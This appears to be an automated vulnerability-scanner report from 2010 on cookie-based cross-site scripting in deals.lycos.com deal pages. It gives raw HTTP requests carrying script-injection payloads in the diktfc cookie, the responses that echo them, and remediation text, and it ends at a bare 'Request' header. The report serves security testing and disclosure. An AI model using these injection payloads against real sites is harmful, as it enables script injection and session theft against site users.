HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:29 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b9b"%3balert(1)//d6f0902539e was submitted in the diktfc cookie. This input was echoed as e7b9b";alert(1)//d6f0902539e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b"%3balert(1)//d6f0902539e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:31 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18845
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a58"><script>alert(1)</script>e26ae126c13 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17609
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a834a"%3balert(1)//5a3d78b4e4f was submitted in the diktfc cookie. This input was echoed as a834a";alert(1)//5a3d78b4e4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a"%3balert(1)//5a3d78b4e4f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17580
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8b4"%3balert(1)//6666cd16315 was submitted in the diktfc cookie. This input was echoed as 3b8b4";alert(1)//6666cd16315 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4"%3balert(1)//6666cd16315; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:41 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18637
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfde"><script>alert(1)</script>8551183e611 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d57"%3balert(1)//40027816f73 was submitted in the diktfc cookie. This input was echoed as 15d57";alert(1)//40027816f73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57"%3balert(1)//40027816f73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:18 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18761
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e75"><script>alert(1)</script>1d919f1ca71 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff58e"%3balert(1)//2eff680c602 was submitted in the diktfc cookie. This input was echoed as ff58e";alert(1)//2eff680c602 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e"%3balert(1)//2eff680c602; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16725
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6006c"><script>alert(1)</script>104c0231a35 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e8f"%3balert(1)//4a914e95c2b was submitted in the diktfc cookie. This input was echoed as c2e8f";alert(1)//4a914e95c2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f"%3balert(1)//4a914e95c2b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17406
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe5d1"><script>alert(1)</script>c619991de16 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... g src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa24"><script>alert(1)</script>1fe7a425fe9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce470"%3balert(1)//88a1fe2d76c was submitted in the diktfc cookie. This input was echoed as ce470";alert(1)//88a1fe2d76c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470"%3balert(1)//88a1fe2d76c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:29 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18425
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e7d6"%3balert(1)//c92b2a5a915 was submitted in the diktfc cookie. This input was echoed as 9e7d6";alert(1)//c92b2a5a915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
